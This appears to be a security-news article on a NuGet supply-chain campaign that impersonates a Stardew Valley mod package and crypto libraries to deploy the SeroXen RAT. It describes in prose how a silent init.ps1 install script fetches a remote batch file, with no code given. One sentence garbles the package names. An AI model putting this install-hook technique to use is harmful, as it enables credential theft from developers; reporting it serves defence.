The SeroXen RAT, a remote access trojan, was recently found to be distributed using a malicious package on the NuGet package manager for the.NET Framework. The Pathoschild suspicious package.The file Stardew.Mod.Build.Config, credited to a user named Disti, purposefully mimics the legal package Pathoschild.Stardew.ModBuildConfig.
The real file has received about 79,000 downloads, according to Phylum, a software supply chain security company, while the malicious version, released on October 6, 2023, intentionally inflates its download count to exceed 100,000 downloads. On this user’s profile, there are six further products with a combined total of almost 2.1 million downloads. Kraken, KuCoin, Solana, and Monero are four of these packages that pretend to be crypto service libraries but actually include the SeroXen RAT deployment code.
This approach starts with the installation of the package and uses a script called tools/init.ps1 that is made to run code silently. This behavior, which JFrog identified as a security flaw in March 2023, is used to retrieve further malware. Despite being marked as deprecated, Visual Studio still respects the init.ps1 script and permits it to run unattended while installing NuGet packages. In this.ps1 file, attackers are able to insert any commands they want.
In the specific package Phylum analyzed, a PowerShell script is used to retrieve a file named x.bin from a remote server, which is actually a Windows Batch script that has been substantially modified. The deployment of the SeroXen RAT is the result of another PowerShell script that is created and executed by this Batch script.
Cybercriminals can simply get SeroXen RAT because it is widely available malware that costs $60 for a lifetime package. This fileless RAT incorporates elements of the NirCmd Windows command-line tool, the r77 rootkit, and the Quasar RAT.
According to Phylum, the continuous exploitation of open-source ecosystems and the developers that use them is highlighted by the existence of SeroXen RAT within NuGet packages.
The attack strategy focuses on taking advantage of developers’ confidence by introducing a single malicious piece of code to trusted, well-established codebases, enabling the exfiltration of private cloud credentials. The attacker’s strategy is to keep the packages’ original functionality in order to blend in. Both Phylum and Checkmarx, who provided additional details regarding the same campaign, have recognized this simple yet powerful strategy.